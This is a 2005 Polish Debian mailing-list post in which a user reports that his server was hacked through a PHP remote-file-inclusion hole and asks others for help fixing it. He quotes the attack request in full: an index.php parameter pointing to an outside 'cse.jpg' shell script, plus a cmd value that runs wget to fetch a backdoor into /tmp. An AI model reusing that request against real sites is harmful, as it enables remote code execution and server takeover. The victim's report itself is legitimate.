Zhackowano mnie! Data Cha0s PHP Command

To: debian <debian-user-polish@lists.debian.org>
Subject: Zhackowano mnie! Data Cha0s PHP Command
From: Lucas <dyskusje@wzr.pl>
Date: Tue, 05 Jul 2005 16:31:44 +0200
Message-id: <[🔎] 42CA99D0.50206@wzr.pl>

Witam wszystkich,
zauważyłęm dzisiaj, że zhackowano mi debiana 2.4.26, poprzez dziurę w php.

Panowie przybyli z Brazylii i używając skryptuhttp://1ncident.100free.com/cse.jpg dostali się do konsoli (całeszczęście jako www-data). Nie narobili żadnych szków oprócz faktu, żeuruchomili skrypt w perlu ktry zabierał 99% zasobów (to było połączeniedo irca), tak czy siak, jak sprawdzam, to mimo upgradu perla, php,apacha to dziura i tak pozostaje. Tworząc odpowiedznio zapytanie do PHP,konkretnie toindex.php?akcja=http://1ncident.100free.com/cse.jpg?&cmd=cd%20/tmp%20;%20wget%20www.quacks.info/rm-rf/bd.txtmogą wciąż pobrać skrypcik, lub wykonać polecenie konsoli.Narazie poprostu zdjąłem "niebezpieczny" kod ze strony www, a właściwiecałą www aby zapobiec dalszemu logowaniu się.

W necie jest trochę materiałów - żalenia się, jednak na żadenzdecydowany sposób poradzenia sobie z problemem nie trafiłem.

Może ktos już powalczył z tym trochę i chciałby się podzielić wrażeniami.

http://www.chovy.com/2005/02/simiens-crew-2005-how-they-did-it.html
http://vil.nai.com/vil/content/v_129568.htm

pozdrowienia,
Lucas

Reply to:

Follow-Ups:
- Re: Zhackowano mnie! Data Cha0s PHP Command
  - From: Marcin Sochacki <wanted@gnu.univ.gda.pl>

Prev by Date: Re: freenet i java
Next by Date: sprawdzanie kto gdzie gra
Previous by thread: freenet i java
Next by thread: Re: Zhackowano mnie! Data Cha0s PHP Command
Index(es):
- Date
- Thread